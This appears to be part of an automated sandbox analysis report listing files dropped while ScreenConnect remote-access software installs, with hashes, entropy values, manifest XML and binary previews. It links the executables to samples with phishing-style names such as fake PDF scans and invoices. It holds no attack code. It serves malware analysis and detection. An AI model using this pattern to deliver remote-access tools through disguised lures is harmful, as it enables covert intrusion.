Preview:	PcmH..............f.......!...T...........................e...?....<.g..J.\|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......\|...........................................@.......0...........<.......T.......h.......\|...0.......................................0...........<.......T.......h.......\|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3452
Entropy (8bit):	4.331951748119848
Encrypted:	false
SSDEEP:	96:mJ3uWW7vvvieV+WwQXlmL4MckVM8Aw+IhIYX:03OvvvtJUUMckmb9wf
MD5:	C1D32F5DD328ABB3A16B4F7BD7C4B1DB
SHA1:	65458EF5B934613E10970C4DBED7271407A37620
SHA-256:	9E93A542B3E8400F8F8C99BB976091957099E5D2668C8328CFC7E7E0EF600A6A
SHA-512:	6EFC70D99B0ED74851F50353F8CFE2EAA8E9783ABD024BE5CA2BE9639DBEFC040ED93867E262169D6489F4420E5486C647AFB53019CC7FE78E61698BC4A02DB5
Malicious:	false
Preview:	PcmH........7....#.A#...(.......T..........................."........<.g..J.\|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	5260
Entropy (8bit):	4.184942727701058
Encrypted:	false
SSDEEP:	96:yNq6R84uvvvvvvvceV+Ww7mk9O43jYHlIgBXw0vX3WVhwnjIbm:WR84uvvvvvvvTJC9tUHlXBXztjd
MD5:	E4CDDFF61EF846BC4CC51624A4DDE74D
SHA1:	99768FEA980AB925371FD553A33FA0BCAA8940BE
SHA-256:	4B2A4A1793F65C967B20A3F91A49A3E0F2C682B080E9EA83F2E612C5042A1DF3
SHA-512:	F5C1FBDCF45A7F813D848FE7763D1873541125994262074A3DE315A1BCBFB31F937892C064DA6523D6B73849E18F396597AAF907AEC9269995396A2B7287EB49
Malicious:	false
Preview:	PcmH........}.f`...\4...t.......T...............P...........3........<.g..J.\|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......\|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p.......................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	6588
Entropy (8bit):	4.114471933348246
Encrypted:	false
SSDEEP:	192:kxkvvvvvvvvvvbJwpZ2LRhyl5dVzzaw75:SHccfaI5
MD5:	4CFD025BD18AC5B1008CA6DF148B17FF
SHA1:	884CE1F139531F8D03F84ADCD7BB631C324B0DDD
SHA-256:	CBCF8D15F30B3814B7B301F3D16575F14D06FB3CA774B9241F5825FD644109FA
SHA-512:	51E88A7945F73BD1C531EBA4AFD7BF000EDC0F20B10506AC22D3F406B4ED709F92E0B6A6383C3A6274C3FE179AAAE1E9E89D0E59D834C244DBF937C4BD8ECD67
Malicious:	false
Preview:	PcmH.............{Y~@...........T...............t...........?........<.g..J.\|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3032
Entropy (8bit):	4.8729050934342775
Encrypted:	false
SSDEEP:	48:jvMQScwvvsgye6S+9oww7g47Jw+f7iI++5dFkEM6Vbjftsnwbb:zXScwvvaeV+WwwnJwOiMRkbortsnEb
MD5:	5ADE6186A5EDF27D1117BE2E5C6D4385
SHA1:	788177AA2F4A9080E12C38A7C95B852C69981080
SHA-256:	FCA8D1BBA634CC9C5A39D3181BCD125571285D246CE62EA0BF0A7A26A2AAFA9C
SHA-512:	72AC2B410B101B2F90A0882723DC5FC974E63A048473B95C4B4352AB508F9735C2527D3187785E2B74C52466396C335528518132D524A1B2A9FF8EA0E9991D96
Malicious:	false
Preview:	PcmH........-.8K................T....................................<.g..J.\|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ...".............Bp urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	14612
Entropy (8bit):	5.715955315394059
Encrypted:	false
SSDEEP:	192:IWh4+en9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOx:IWC9qS6VTX9dX9R/QPIBM7YDm
MD5:	3F4D97B3639918382156C3E180CC8BE8
SHA1:	5CE6A8EE647F769B4BEE51CC85AC09663FE7EDD3
SHA-256:	3DCAE570677CA7D25E18A5AC6E2ED19FBC95DC84B8A602E54E167104BC5047F1
SHA-512:	B592218D8F602DB9C2A284DC5D41FCA57998C464DB320B0E273325561843E5662AC520DD751BB45330499234D2CD4BEE6C37CAB967C74BB26D09712EE5C00446
Malicious:	false
Preview:	PcmH.........[..P.-g$...@.......T...............8...........#........<.g..J.\|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...\|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om..c.............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	242016
Entropy (8bit):	5.858471214140723
Encrypted:	false
SSDEEP:	6144:0FcfiVIfQZlENURlENURlENURlENURlENUcmt8vOvP:Oc26UCUCUCUCUh2cP
MD5:	D8259314C0A0D0B11E4979470E4B973A
SHA1:	552BDA7DE4DB0B4DC772C578664DCBDCC9E58D6C
SHA-256:	B8289C61E2C1A1076D4244823E71CD2D877FEA82504B45B0C80753F5BABD9E12
SHA-512:	47A93656BAAAE18242B930BD6F2574E6C62286D965142F2C7DF431B0754F92EE142BC4FD8CA719EB14EB40FE4EDAEB95DBB7ED7528A9B2CCAB34063FD887F3B0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	4428
Entropy (8bit):	4.076363247876233
Encrypted:	false
SSDEEP:	96:/vXAvvvvv1eV+Ww8U45ucOEgyKHcThakoNOrf:HwvvvvvKJjucMMPoq
MD5:	7C2074843766C366136BE3FF950BFBD7
SHA1:	F2FEEBE73637D3DA7AA67AC62E1C117CC5201D42
SHA-256:	E0CC8DB642751A95DBCAB334F3E84FE23289FB838B8F69E9B1D392CF600DF5EF
SHA-512:	A1FD2E0C66695FEF788D7F0C0678AAA7B0143E77D3520C3E7CC4BB38909A61744E922333153EFDDFD28F99C107664B0A22FE71ABDC8832E2322F9DC947222A3A
Malicious:	false
Preview:	PcmH..............gd,...T.......T...............8...........+........<.g..J.\|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......\|...........(...............................(................... ...(...4.......\.......d...(...\|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse Filename: He6pI1bhcA.exe, Detection: malicious, Browse Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse Filename: VD01NDHM8u.exe, Detection: malicious, Browse Filename: vovE92JSzK.exe, Detection: malicious, Browse Filename: s9POKY8U8k.exe, Detection: malicious, Browse Filename: xkIXA8M8sC.exe, Detection: malicious, Browse Filename: He6pI1bhcA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse Filename: He6pI1bhcA.exe, Detection: malicious, Browse Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse Filename: VD01NDHM8u.exe, Detection: malicious, Browse Filename: vovE92JSzK.exe, Detection: malicious, Browse Filename: s9POKY8U8k.exe, Detection: malicious, Browse Filename: xkIXA8M8sC.exe, Detection: malicious, Browse Filename: He6pI1bhcA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
